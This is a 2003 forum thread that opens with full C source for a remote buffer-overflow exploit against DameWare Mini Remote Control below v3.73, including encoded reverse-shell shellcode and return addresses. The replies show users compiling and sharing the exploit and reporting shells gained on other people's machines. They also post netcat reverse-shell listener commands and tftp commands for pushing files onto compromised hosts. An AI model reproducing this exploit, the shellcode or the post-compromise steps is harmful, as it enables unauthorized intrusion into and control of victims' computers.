Dameware Mini Remote Control V3.73 Remote Exploit

GaLiaRePt

Dec 20 2003, 02:19 PM

DameWare Mini Remote Control < v3.73 remote exploit
Date: 2003-12-20

Author : Iván Rodriguez Almuiña <kralor_@_coromputer.net>
Download : http://www.security-corporation.com/downlo...oit/DameWeird.c

CODE

/ ********************************************************************************
******/
/* [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt] */
/* - - - - - - - - - - - - - - - - - - - - - */
/* 8/10 win2k successfully exploited in blind mode (lang & type [pro,srv,etc] unknown) */
/* tested against dameware versions: v3.68 v3.72 */
/* In comments there's some information about offsets for jmp esp on diff OS. */
/* I've fixed a problem in the shellc0de, when I check for kernel32.dll, on winXP it */
/* is kernel32.dll, but on win2k it is KERNEL32.DLL (both in unicode format) */
/* shellc0de is a bit long for this b0f, so ExitThread won't be called, but it is in */
/* the shellcode.Some people reported me 2 different offsets for winXP pro, home, sp0 */
/* or sp1, so I don't know why it's different and I haven't XP at home I can't find */
/* another better EIP for XP (hope this 2 offsets will be enough). */
/* greetz: MrNice,AnAc,TripaX & Decryptus for helping me to find the EIP values. */
/*....................................................................................*/
/* informations: kralor[at]coromputer.net,www.coromputer.net,irc undernet #coromputer */
/ ********************************************************************************
******/

#include <winsock.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#pragma comment (lib,"ws2_32")

/*
0x717564B8 jmp esp in comctl32.dll
win2k fr adv srv sp2
win2k en adv srv sp3
win2k en adv srv sp4
win2k en srv sp3
win2k fr pro sp3
win2k en pro sp4

// jmp esp @ 0x77E7898B | win2k fr adv srv sp 1
// jmp esp @ 0x717564B8 | Win2k fr adv srv sp2 & Win2k en srv sp3 & Win2k en adv srv sp4 & win2k fr pro sp3
// jmp esp @ 0x7751A3AB | Win2k fr adv srv sp2 Win2k fr adv srv sp3 & Win2k fr pro sp3

/*
#define RET_WIN2K_SP0 0x717564B8
#define RET_WIN2K_SP1 0x717564B8
#define RET_WIN2K_SP2 0x717564B8
#define RET_WIN2K_SP3 0x717564B8
#define RET_WIN2K_SP4 0x717564B8
#define RET_WINXP_SP0 0x7776FE1F
#define RET_WINXP_SP1 0x7776FE1F
*/

#define RET "\xB8\x64\x75\x71"
#define RET_XP "\x07\xD5\x36\x77"
// or #define RET_XP "\xC1\x1C\x35\x77" // this offset has been reported by many people

#define PORT 6129
#define SIZEOF 4096
#define WINUSER "h4x0r"
#define WINHOST "l33t_home"
#define USERPROFILE_NAME "script kiddie"
#define USERPROFILE_COMPANY "g33k solutions."
#define USERPROFILE_LICENSE "11111-OEM-0001111-11111"
#define USERPROFILE_DATE "12/24/03 00:00:00"
#define INTERFACE_IP "192.168.1.1,192.168.1.2"
#define WINDOMAIN "l33t_d0m41n"
#define CLIENT_VERSION "3.72.0.0"

/*
void print_packet(char *buffer, int begin, int end)
{
int i,j;
char ascii[9];

for(i=begin,j=0;i<end;i++,j++) {
if(i%10==0) {
printf("\r\n%04d: ",i);
j=0;
memset(ascii,0,sizeof(ascii));
}
printf("0x%02x ",(unsigned char)buffer[i]);
if(i%10==9) {
ascii[10]=0x00;
printf("%s",ascii);
}
if(!isprint(buffer[i]))
ascii[j]='.';
else
ascii[j]=buffer[i];
}
printf("%s\r\n",ascii);
return;
}
*/

int cnx(char *host)
{
int sock;
struct sockaddr_in yeah;
struct hostent *she;

sock=socket(AF_INET,SOCK_STREAM,0);
if(!sock) {
printf("error: unable to create socket\r\n");
return 0;
}
yeah.sin_family=AF_INET;
yeah.sin_addr.s_addr=inet_addr(host);
yeah.sin_port=htons(PORT);

if((she=gethostbyname(host))!=NULL) {
memcpy((char *)&yeah.sin_addr,she->h_addr,she->h_length);
} else {
if((yeah.sin_addr.s_addr=inet_addr(host))==INADDR_NONE) {
printf("error: cannot resolve host\r\n");
return 0;
}
}
printf("[+] Connecting to %-30s ...",host);
if(connect(sock,(struct sockaddr*)&yeah,sizeof(yeah))!=0) {
printf("error: connection refused\r\n");
return 0;
}
printf("Done\r\n");
return sock;
}

void set_sc(int os, int sp, char *rhost, int rport, char *shellc0de)
{
unsigned int ip=0;
unsigned short port=0;
char *port_to_shell="",*ip1="";

ip = inet_addr(rhost); ip1 = (char*)&ip;
shellc0de[325]=ip1[0]^0x95;shellc0de[326]=ip1[1]^0x95;
shellc0de[327]=ip1[2]^0x95; shellc0de[328]=ip1[3]^0x95;

port = htons(rport);
port_to_shell = (char *) &port;
shellc0de[319]=port_to_shell[0]^0x95;
shellc0de[320]=port_to_shell[1]^0x95;

switch(os)
{
case 0: // win2k
/*
switch(sp)
{
case 0:
*(long*)&shellc0de[0]=RET_WIN2K_SP0;
break;
case 1:
*(long*)&shellc0de[0]=RET_WIN2K_SP1;
break;
case 2:
*(long*)&shellc0de[0]=RET_WIN2K_SP2;
break;
case 3:
*(long*)&shellc0de[0]=RET_WIN2K_SP3;
break;
case 4:
*(long*)&shellc0de[0]=RET_WIN2K_SP4;
break;
}
*/
break;
case 1: // winXP
shellc0de[167]=shellc0de[215]=(unsigned char)0xfe;
shellc0de[345]=shellc0de[453]=(unsigned char)0xfe;
/*
switch(sp)
{
case 0:
*(long*)&shellc0de[0]=RET_WINXP_SP0;
break;
case 1:
*(long*)&shellc0de[0]=RET_WINXP_SP1;
break;
}
*/
break;
}
return;
}

int start_auth(int sock, char *rhost, int rport)
{
int size,i=4,os,sp;
char buffer[SIZEOF];
char shellc0de[] =
"\xeb\x02\xeb\x0f\x66\x81\xec\x04\x08\x8b\xec\x83\xec\x50\xe8\xef"
"\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\xba\x01\x80\x33\x95"
"\x43\xe2\xfa\x7e\xfa\xa6\x4e\x26\xa5\xf1\x1e\x96\x1e\xd5\x99\x1e"
"\xdd\x99\x1e\x54\x1e\xc9\xb1\x9d\x1e\xe5\xa5\x96\xe1\xb1\x91\xad"
"\x8b\xe0\xdd\x1e\xd5\x8d\x1e\xcd\xa9\x96\x4d\x1e\xce\xed\x96\x4d"
"\x1e\xe6\x89\x96\x65\xc3\x1e\xe6\xb1\x96\x65\xc3\x1e\xc6\xb5\x96"
"\x45\x1e\xce\x8d\xde\x1e\xa1\x0f\x96\x65\x96\xe1\xb1\x81\x1e\xa3"
"\xae\xe1\xb1\x8d\xe1\x93\xde\xb6\x4e\xe0\x7f\x56\xca\xa6\x5c\xf3"
"\x1e\x99\xca\xca\x1e\xa9\x1a\x18\x91\x92\x56\x1e\x8d\x1e\x56\xae"
"\x54\xe0\x34\x56\x16\x79\xd5\x1e\x79\x14\x79\xb5\x97\x95\x95\xfd"
"\xec\xd0\xed\xd4\xff\x9f\xff\xde\xff\x95\x7d\xe3\x6a\x6a\x6a\xa6"
"\x5c\x52\xd0\x69\xe2\xe6\xa7\xca\xf3\x52\xd0\x95\xa6\xa7\x1d\xd8"
"\x97\x1e\x48\xf3\x16\x7e\x91\xc4\xc4\xc6\x6a\x45\x1c\xd0\x91\xfd"
"\xe7\xf0\xe6\xe6\xff\x9f\xff\xde\xff\x95\x7d\xd3\x6a\x6a\x6a\x1e"
"\xc8\x91\x1c\xc8\x12\x1c\xd0\x02\x52\xd0\x69\xc2\xc6\xd4\xc6\x52"
"\xd0\x95\xfa\xf6\xfe\xf0\x52\xd0\x91\xe1\xd4\x95\x95\x1e\x58\xf3"
"\x16\x7c\x91\xc4\xc6\x6a\x45\xa6\x4e\xc6\xc6\xc6\xc6\xff\x94\xff"
"\x97\x6a\x45\x1c\xd0\x31\x52\xd0\x69\xf6\xfa\xfb\xfb\x52\xd0\x95"
"\xf0\xf6\xe1\x95\x1e\x58\xf3\x16\x7c\x91\xc4\x6a\xe0\x12\x6a\xc0"
"\x02\xa6\x4e\x26\x97\x1e\x40\xf3\x1c\x8f\x96\x46\xf3\x52\x97\x97"
"\x0f\x96\x46\x52\x97\x55\x3d\x94\x94\xff\x85\xc0\x6a\xe0\x31\x6a"
"\x45\xfd\xf0\xe6\xe6\xd4\xff\x9f\xff\xde\xff\x95\x7d\x51\x6b\x6a"
"\x6a\xa6\x4e\x52\xd0\x39\xd1\x95\x95\x95\x1c\xc8\x25\x1c\xc8\x2d"
"\x1c\xc8\x21\x1c\xc8\x29\x1c\xc8\x55\x1c\xc8\x51\x1c\xc8\x5d\x52"
"\xd0\x4d\x94\x94\x95\x95\x1c\xc8\x49\x1c\xc8\x75\x1e\xd8\x31\x1c"
"\xd8\x71\x1c\xd8\x7d\x1c\xd8\x79\x18\xd8\x65\xc4\x18\xd8\x39\xc4"
"\xc6\xc6\xc6\xff\x94\xc6\xc6\xf3\x52\xd0\x69\xf6\xf8\xf3\x52\xd0"
"\x6b\xf1\x95\x1d\xc8\x6a\x18\xc0\x69\xc7\xc6\x6a\x45\xfd\xed\xfc"
"\xe1\xc1\xff\x94\xff\xde\xff\x95\x7d\xcd\x6b\x6a\x6a\x6a";

size=recv(sock,buffer,SIZEOF,0);
if(buffer[0]!=0x30||buffer[1]!=0x11) {
printf("error: wrong data received\r\n");
return -1;
}
buffer[28]=0x00;buffer[36]=0x01;
send(sock,buffer,size,0);
memset(buffer,0,SIZEOF);
printf("[+] Gathering %-30s ...","information");
for(size=0;size<4096;size+=recv(sock,&buffer[size],SIZEOF,0));

if(buffer[0]!=0x10||buffer[1]!=0x27) {
printf("error: wrong data received\r\n");
return -1;
}
printf("Done\r\n");
sp=(unsigned int)buffer[37];
printf("[i] Operating system : ");
if(buffer[16]==0x28||buffer[17]==0x0a) {
os=1;
printf("WinXP");
} else {
printf("Win2000");
os=0;
}
printf("\r\n[i] Service Pack : %s\r\n",&buffer[37]);
printf("[+] Setting shellc0de for this %-15s ...","version");
set_sc(os,sp,rhost,rport,shellc0de);

memset(&buffer[2],0,SIZEOF-2);
strcpy(&buffer[175],WINUSER);
memset(&buffer[416],0x90,180);
if(os==0)
memcpy(&buffer[516],RET,4);
else
memcpy(&buffer[516],RET_XP,4);
memcpy(&buffer[520],shellc0de,sizeof(shellc0de));
strcpy(&buffer[1200],WINHOST);strcpy(&buffer[975],USERPROFILE_NAME);
strcpy(&buffer[1295],USERPROFILE_COMPANY);strcpy(&buffer[1495],USERPROFILE_LICENSE);
strcpy(&buffer[1755],USERPROFILE_DATE);strcpy(&buffer[2015],WINHOST);
strcpy(&buffer[2275],INTERFACE_IP);strcpy(&buffer[2535],WINDOMAIN);
strcpy(&buffer[2795],CLIENT_VERSION);
printf("Done\r\n");
printf("[+] Sending evil %-30s ...","packet");
send(sock,buffer,SIZEOF,0);
memset(buffer,0,SIZEOF);
size=recv(sock,buffer,SIZEOF,0);

if(buffer[0]!=0x32||buffer[1]!=0x11) {
printf("Patched\r\n");
return -1;
}
printf("Done\r\n");
printf("[i] Shell should be arrived at %s:%d\r\n",rhost,rport);
return 0;
}

void banner(void)
{
printf("\r\n [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt]\r\n");
printf("\t\t www.coromputer.net && undernet #coromputer\r\n\r\n");
return;
}

int main(int argc, char *argv[])
{
WSADATA wsaData;
int sock;

banner();
if(argc!=4) {
printf("syntax: %s <host> <your_ip> <your_port>\r\n",argv[0]);
return -1;
}
if(WSAStartup(0x0101,&wsaData)!=0) {
printf("error: unable to load winsock\r\n");
return -1;
}
sock=cnx(argv[1]);
if(!sock)
return -1;
start_auth(sock,argv[2],atoi(argv[3]));
return 0;
}

Enjoy ;-)

X-FloppY

Dec 20 2003, 02:34 PM

Hmm looks very nice
can someone compile it ?:X

temptation

Dec 20 2003, 02:34 PM

DameWare Mini Remote Control
^^ on which port is this running?

thx

Lanig

Dec 20 2003, 02:37 PM

hmm to scan for this vuln i need to scan port 6129 (default for this service i think)
or is there some better way?

Yosam

Dec 20 2003, 02:38 PM

hmm, compiled successfully but,
what is <your_port> ?
what should i put in there?

and how do i scan for this?
which port should i scan and what banner (if needed) ?

thanks.

X-FloppY

Dec 20 2003, 02:40 PM

Yosam can you please post the compiled exploit?
so we can help?

PuPPaFiSH

Dec 20 2003, 02:52 PM

Thank for the info, I'll try and compile it

Divx_dude

Dec 20 2003, 03:03 PM

QUOTE (Yosam @ Dec 20 2003, 02:38 PM)

hmm, compiled successfully but,
what is <your_port> ?
what should i put in there?

and how do i scan for this?
which port should i scan and what banner (if needed) ?

thanks.

well u need to run a shell on your pc on port ( example ) 444

then u go to the exploit and ya give your ip in + the port whats your nc is running on your pc

sorry for bad english

X-FloppY

Dec 20 2003, 03:04 PM

i hate those that are compiling for theirselfs and not posting
it's annoying
like Yosam

KoNh

Dec 20 2003, 03:57 PM

QUOTE (X-FloppY @ Dec 20 2003, 03:04 PM)

i hate those that are compiling for theirselfs and not posting
it's annoying
like Yosam

just try to compile yerself, this way we can
try to keep out some scripts kiddyz, unless yer one ?

X-FloppY

Dec 20 2003, 04:02 PM

Sorry m8 i don't know how to compile ....
if ya like to teach me so pm me

Divx_dude

Dec 20 2003, 04:10 PM

dude

ther emany progs for compiling

DEV c++ is a very good one

try google and search

sorry for bad english

X-FloppY

Dec 20 2003, 04:38 PM

k dude thank's
(:
btw can you compile this exploit for now?

JdEeZy

Dec 20 2003, 07:17 PM

great exploit, got some shells.

Axl

Dec 20 2003, 08:49 PM

QUOTE (Lanig @ Dec 20 2003, 02:37 PM)

hmm to scan for this vuln i need to scan port 6129 (default for this service i think)
or is there some better way?

I find scanning for 6129 to be most likely the best way. Problem is at least on the ranges i scan nobody has 6129 open

Lanig

Dec 20 2003, 09:04 PM

hmm i compiled this exploit but when i try it it just crashes my dameware mini remote control and not opening a shell but it might be my windows or something (winxp without sp1)
http://wave.prohosting.com/eperry/DWMRC.exe

enjoy

ivan288

Dec 20 2003, 10:27 PM

i found out that it does crash some boxes but that eventually u get a shell. my friend even got one on win2000 and i think this is suppose to be for Xp only.

Axl

Dec 20 2003, 11:40 PM

no, it's not just for xp... i've gotten xp boxes and 2000 boxes with it only prob is they've got a/v and it kills you like 2 minutes after u get shell.

UnDeRTaKeR

Dec 20 2003, 11:52 PM

i need some help m8's...
i started on my comp a shell like that:

QUOTE

nc.exe -L -p 22 -d -e CMD.exe

now i tried to exploit some box... and this what i got...

QUOTE

C:\Downloads\Exploits\Dameware Mini Remote Control Server Overflow Explo>DameWei
rd xxx.x.xx.x xx.xx.xx.xx 22

[Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt
]
www.coromputer.net && undernet #coromputer

[+] Connecting to xxx.xx.x.xx ...Done
[+] Gathering information ...Done
[i] Operating system : Win2000
[i] Service Pack : 4
[+] Setting shellc0de for this version ...Done
[+] Sending evil packet ...Done
[i] Shell should be arrived at xx.xxx.xx.x:22

C:\Downloads\Exploits\Dameware Mini Remote Control Server Overflow Explo>

how do i get the shell?!
how the shell should arive?!

please help me...
BTW...
i tried another version that worked perfect exept Win2000SP2&SP4...

mkwento

Dec 21 2003, 12:21 AM

ho ho hoooo!!!!

merry christmas!!!

good job

basthen

Dec 21 2003, 01:20 AM

same prob as Undertaker here

the box is running Win2003 and DameWare 3.70

illwill

Dec 21 2003, 01:50 AM

http://illmob.org compiled version

Axl

Dec 21 2003, 03:29 AM

QUOTE (KoNh @ Dec 20 2003, 03:57 PM)

QUOTE (X-FloppY @ Dec 20 2003, 03:04 PM)

i hate those that are compiling for theirselfs and not posting
it's annoying
like Yosam

just try to compile yerself, this way we can
try to keep out some scripts kiddyz, unless yer one ?

hmm i'd compile myself but i get environment variable errors and what not.

UN|K

Dec 21 2003, 04:17 AM

i just want to know , how i can patch this hole

without re install another version

where can i find a patch ??

XtrA

Dec 21 2003, 07:13 AM

always its doing me this..
is it saying its not hackable?

CODE

dwmrc host_ip myip 333
[Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt]
www.coromputer.net && undernet #coromputer
[08:58:26] <[SkyeR]> [+] Connecting to X.X.X.X ...Done
[08:58:26] <[SkyeR]> error: wrong data received

one time its did me like that?
its like connecting but then connection refused
what may i do ? :\

CODE

dwmrc host myip 9630

[Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt
]
www.coromputer.net && undernet #coromputer

[+] Connecting to X.X.X.X ...error: connection refused

XtrA

Dec 21 2003, 07:47 AM

plz help me!!
now i get in one :]]]]
im in his computer uploaded files and typed
net start serv-u but see:

CODE

net start serv-u
The Serv-U FTP Server service is starting.
Serv-U FTP Server service could not be started.
A service specific error occurred: 100.
More help is available by typing NET HELPMSG 3547.

what now?
what can i do ? :\\\\\

Axl

Dec 21 2003, 08:32 AM

why don't you just name the service youarehacked ? Are you using firedaemon?

mastervampire

Dec 21 2003, 08:32 AM

im like XtrA

i got shell and im in this guys computer, browsing through his stuff, now how do i upload and execute a file on him?

Axl

Dec 21 2003, 08:35 AM

QUOTE (mastervampire @ Dec 21 2003, 08:32 AM)

im like XtrA

i got shell and im in this guys computer, browsing through his stuff, now how do i upload and execute a file on him?

start a tftp server

and do tftp -i yourip get filename tftp32 works great

mastervampire

Dec 21 2003, 08:47 AM

do i have to download tftp server like it did have to download nc.exe ?

ma622

Dec 21 2003, 09:35 AM

could anyone build a proggy which checks the scan.txt for vuln ips and promts it to output.txt without dropping to shell?

XtrA

Dec 21 2003, 09:46 AM

QUOTE (QuantumTopology @ Dec 21 2003, 08:35 AM)

start a tftp server

and do tftp -i yourip get filename tftp32 works great

hmm
i try ..
i opened tftp server and typed ur command in the victim`s computer but tftp dont do nothing and then TimeOut on the victim`s computer..

UnDeRTaKeR

Dec 21 2003, 10:07 AM

Hello anybody there?! Can some one please answer my questions?

shiz

Dec 21 2003, 11:05 AM

QUOTE

Yosam can you please post the compiled exploit?
so we can help?

blah
stop whining and try compiling some yourself, instead of actin like a scriptkid in here..
will get you banned...

knientje

Dec 21 2003, 11:10 AM

QUOTE (UnDeRTaKeR @ Dec 20 2003, 11:52 PM)

i need some help m8's...
i started on my comp a shell like that:

QUOTE

nc.exe -L -p 22 -d -e CMD.exe

now i tried to exploit some box... and this what i got...

QUOTE

C:\Downloads\Exploits\Dameware Mini Remote Control Server Overflow Explo>DameWei
rd xxx.x.xx.x xx.xx.xx.xx 22

[Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt
]
www.coromputer.net && undernet #coromputer

[+] Connecting to xxx.xx.x.xx    ...Done
[+] Gathering information ...Done
[i] Operating system : Win2000
[i] Service Pack    : 4
[+] Setting shellc0de for this version    ...Done
[+] Sending evil packet ...Done
[i] Shell should be arrived at xx.xxx.xx.x:22

C:\Downloads\Exploits\Dameware Mini Remote Control Server Overflow Explo>

how do i get the shell?!
how the shell should arive?!

please help me...
BTW...
i tried another version that worked perfect exept Win2000SP2&SP4...

i also like to know what to do then

knientje

Dec 21 2003, 11:12 AM

QUOTE (mastervampire @ Dec 21 2003, 08:32 AM)

im like XtrA

i got shell and im in this guys computer, browsing through his stuff, now how do i upload and execute a file on him?

how did ya connect to the shell?

Diablotic

Dec 21 2003, 11:13 AM

QUOTE (knientje @ Dec 21 2003, 11:10 AM)

QUOTE (UnDeRTaKeR @ Dec 20 2003, 11:52 PM)

i need some help m8's...
i started on my comp a shell like that:

QUOTE

nc.exe -L -p 22 -d -e CMD.exe

now i tried to exploit some box... and this what i got...

QUOTE

C:\Downloads\Exploits\Dameware Mini Remote Control Server Overflow Explo>DameWei
rd xxx.x.xx.x xx.xx.xx.xx 22

[Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt
]
www.coromputer.net && undernet #coromputer

[+] Connecting to xxx.xx.x.xx    ...Done
[+] Gathering information ...Done
[i] Operating system : Win2000
[i] Service Pack    : 4
[+] Setting shellc0de for this version    ...Done
[+] Sending evil packet ...Done
[i] Shell should be arrived at xx.xxx.xx.x:22

C:\Downloads\Exploits\Dameware Mini Remote Control Server Overflow Explo>

how do i get the shell?!
how the shell should arive?!

please help me...
BTW...
i tried another version that worked perfect exept Win2000SP2&SP4...

i also like to know what to do then

Did try to connect by Netcat on port 22?

knientje

Dec 21 2003, 11:25 AM

QUOTE (Diablotic @ Dec 21 2003, 11:13 AM)

QUOTE (knientje @ Dec 21 2003, 11:10 AM)

QUOTE (UnDeRTaKeR @ Dec 20 2003, 11:52 PM)

i need some help m8's...
i started on my comp a shell like that:

QUOTE

nc.exe -L -p 22 -d -e CMD.exe

now i tried to exploit some box... and this what i got...

QUOTE

C:\Downloads\Exploits\Dameware Mini Remote Control Server Overflow Explo>DameWei
rd xxx.x.xx.x xx.xx.xx.xx 22

[Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt
]
www.coromputer.net && undernet #coromputer

[+] Connecting to xxx.xx.x.xx    ...Done
[+] Gathering information ...Done
[i] Operating system : Win2000
[i] Service Pack    : 4
[+] Setting shellc0de for this version    ...Done
[+] Sending evil packet ...Done
[i] Shell should be arrived at xx.xxx.xx.x:22

C:\Downloads\Exploits\Dameware Mini Remote Control Server Overflow Explo>

how do i get the shell?!
how the shell should arive?!

please help me...
BTW...
i tried another version that worked perfect exept Win2000SP2&SP4...

i also like to know what to do then

Did try to connect by Netcat on port 22?

yeah, doesn't work

mastervampire

Dec 21 2003, 11:26 AM

QUOTE (XtrA @ Dec 21 2003, 09:46 AM)

QUOTE (QuantumTopology @ Dec 21 2003, 08:35 AM)

start a tftp server

and do tftp -i yourip get filename tftp32 works great

hmm
i try ..
i opened tftp server and typed ur command in the victim`s computer but tftp dont do nothing and then TimeOut on the victim`s computer..

i get the same problem, timeout

dam it, i get lots of ips that i can get into but i cant upload a file to them :S allways timeout

UnDeRTaKeR

Dec 21 2003, 11:37 AM

im clueless

woodpecker_sjtu

Dec 21 2003, 01:20 PM

who succed?
i cant get the shell

Divx_dude

Dec 21 2003, 01:28 PM

QUOTE (XtrA @ Dec 21 2003, 07:13 AM)

always its doing me this..
is it saying its not hackable?

CODE

dwmrc host_ip myip 333
[Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt]
www.coromputer.net && undernet #coromputer
[08:58:26] <[SkyeR]> [+] Connecting to X.X.X.X ...Done
[08:58:26] <[SkyeR]> error: wrong data received

one time its did me like that?
its like connecting but then connection refused
what may i do ? :\

CODE

dwmrc host myip 9630

[Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt
]
www.coromputer.net && undernet #coromputer

[+] Connecting to X.X.X.X ...error: connection refused

yo

CODE

dwmrc host myip 9630

[Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt
]
www.coromputer.net && undernet #coromputer

[+] Connecting to X.X.X.X ...error: connection refused

this means the ip isnt running dameware mini remote control

simple as that

slex

Dec 21 2003, 01:29 PM

hi, I do C:\>nc -l -p 444 -e cmd.exe
and next

C:\dame>dameweird **.***.***.** **.***.**.*** 444

[Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt
]
www.coromputer.net && undernet #coromputer

[+] Connecting to **.***.***.** ...Done
[+] Gathering information ...Done
[i] Operating system : Win2000
[i] Service Pack : 6
[+] Setting shellc0de for this version ...Done
[+] Sending evil packet ...Done
[i] Shell should be arrived at **.***.**.***:444

but no shell binded on the port 444... why ?
:/

Axl

Dec 21 2003, 02:15 PM

QUOTE (mastervampire @ Dec 21 2003, 11:26 AM)

QUOTE (XtrA @ Dec 21 2003, 09:46 AM)

QUOTE (QuantumTopology @ Dec 21 2003, 08:35 AM)

start a tftp server

and do tftp -i yourip get filename tftp32 works great

hmm
i try ..
i opened tftp server and typed ur command in the victim`s computer but tftp dont do nothing and then TimeOut on the victim`s computer..

i get the same problem, timeout

dam it, i get lots of ips that i can get into but i cant upload a file to them :S allways timeout

erm the tftp works great guys but when you transfer the big apps (as in 1 mb) the thing crashes... but u still get the whole thing transfered and u just have to reconnect. then just run your bats like normal *example: c:\windows\system32\inst.bat

matrix001

Dec 21 2003, 02:17 PM

you must
nc -l -vv -p PORT

dmwrc.exe targetip yourip netcatport

e.g.

nc -l -vv -p 963

dmwrc.exe 12.12.12.12 66.66.66.66 963

If the exploit is sucessful a shell from the target (12.12.12.12) will conntect to your PC

Axl

Dec 21 2003, 02:22 PM

at last some wisdom !!!!

u idiot lamers !!!

u dont know whats a bind back shell ?!? OMG !!!

admin !!!! this forum is going down fasttttt......

nc.exe -l -p port -vvv

and then it will send a shell to your listening port !!!

UnDeRTaKeR

Dec 21 2003, 05:29 PM

Axl Chill down...

X-FloppY

Dec 21 2003, 06:23 PM

Chill m8 ppl is coming to learn
btw it's nc -l -vv -p port

EnjoY

Killahbee

Dec 21 2003, 06:50 PM

But every time the same old message:

CODE

C:\hack\dmware>dameweird xxx.xx.xxx.xxx xx.xxx.xx.xxx 333

[Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt
]
www.coromputer.net && undernet #coromputer

[+] Connecting to xxx.xx.xxx.xxx ...Done
[+] Gathering information ...Done
[i] Operating system : Win2000
[i] Service Pack : 6
[+] Setting shellc0de for this version ...Done
[+] Sending evil packet ...Done
[i] Shell should be arrived at xx.xxx.xx.xxx:333

but no shell arrived, damn damn damn

Double-=V=-

Dec 21 2003, 07:02 PM

QUOTE (Killahbee @ Dec 21 2003, 06:50 PM)

But every time the same old message:

CODE

C:\hack\dmware>dameweird xxx.xx.xxx.xxx xx.xxx.xx.xxx 333

[Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt
]
www.coromputer.net && undernet #coromputer

[+] Connecting to xxx.xx.xxx.xxx ...Done
[+] Gathering information ...Done
[i] Operating system : Win2000
[i] Service Pack : 6
[+] Setting shellc0de for this version ...Done
[+] Sending evil packet ...Done
[i] Shell should be arrived at xx.xxx.xx.xxx:333

but no shell arrived, damn damn damn

Well maby the host is firewalled.